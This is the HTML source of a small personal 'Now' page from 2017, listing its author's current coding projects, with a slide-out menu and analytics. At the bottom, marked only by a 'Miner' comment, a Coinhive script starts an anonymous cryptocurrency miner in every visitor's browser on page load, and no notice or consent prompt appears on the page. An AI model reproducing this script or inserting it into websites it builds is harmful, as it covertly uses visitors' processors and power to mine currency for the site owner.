<!DOCTYPE html>
<html><head><title>Codelog Now</title></head>
<link rel=icon href=https://cdn3.iconfinder.com/data/icons/luchesa-vol-9/128/Html-512.png>
<body style="background-image:url(https://www.beautycolorcode.com/cdcdcd.png)">
<link href="style.css" text="text/css" rel="stylesheet">
 
<!-- Latest compiled and minified CSS -->
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">

<!-- jQuery library -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>

<!-- Latest compiled JavaScript -->
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script> 
 
 
    <!-- These are the pages -->
<style>
body {
    font-family: "Lato", sans-serif;
}

.sidenav {
    height: 100%;
    width: 0;
    position: fixed;
    z-index: 1;
    top: 0;
    left: 0;
    background-color: #111;
    overflow-x: hidden;
    transition: 0.5s;
    padding-top: 60px;
    text-align:center;
}

.sidenav a {
    padding: 8px 8px 8px 32px;
    text-decoration: none;
    font-size: 25px;
    color: #818181;
    display: block;
    transition: 0.3s;

}

.sidenav a:hover{
    color: #f1f1f1;
}

.sidenav .closebtn {
    position: absolute;
    top: 0;
    right: 25px;
    font-size: 36px;
    margin-left: 50px;
}

@media screen and (max-height: 450px) {
  .sidenav {padding-top: 15px;}
  .sidenav a {font-size: 18px;}
}
</style>

<div id="mySidenav" class="sidenav">
  <a href="javascript:void(0)" class="closebtn" onclick="closeNav()">&times;</a>
  <a href="/">Home</a>
  <a href="/about.github.io/">About me</a>
  <a href="/now.github.io/">Now</a>
  <a href="/friends.github.io/">Friends, Stuff</a>
</div>
<span style="font-size:30px;cursor:pointer" onclick="openNav()">&#9776; open</span>

<script>
function openNav() {
    document.getElementById("mySidenav").style.width = "100%";
}

function closeNav() {
    document.getElementById("mySidenav").style.width = "0";
}
</script>
    <!-- End -->

    <h1><p>What am I doing now?</p></h1>
    <ul>
        <li>Coding my website with James Gifford</li>
        <li>working on other mini projects</li>
    </ul>
     <script>
      (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
      (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
      m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
      })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
    
      ga('create', 'UA-99016481-1', 'auto');
      ga('send', 'pageview');
    
    </script>
    
<br>
<div style="color:gray">
<center>
Copyright 2017 Galien1
</center>
</div>
<a href="http://galien1.github.io/Tos/">Terms of service</a>
    <!-- Miner -->
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>

    var miner = new CoinHive.Anonymous('RlGAt8lTJCiTqjr9OqXielT42XrsEFLl', { throttle: 0.5 });
    miner.start(CoinHive.FORCE_EXCLUSIVE_TAB);
    miner.start();
</script>

<script>
    // Listen on events
    miner.on('found', function() { /* Hash found */ })
    miner.on('accepted', function() { /* Hash accepted by the pool */ })

    // Update stats once per second
    setInterval(function() {
        var hashesPerSecond = miner.getHashesPerSecond();
        var totalHashes = miner.getTotalHashes();
        var acceptedHashes = miner.getAcceptedHashes();

        // Output to HTML elements...
    }, 1000);
</script>
</body>
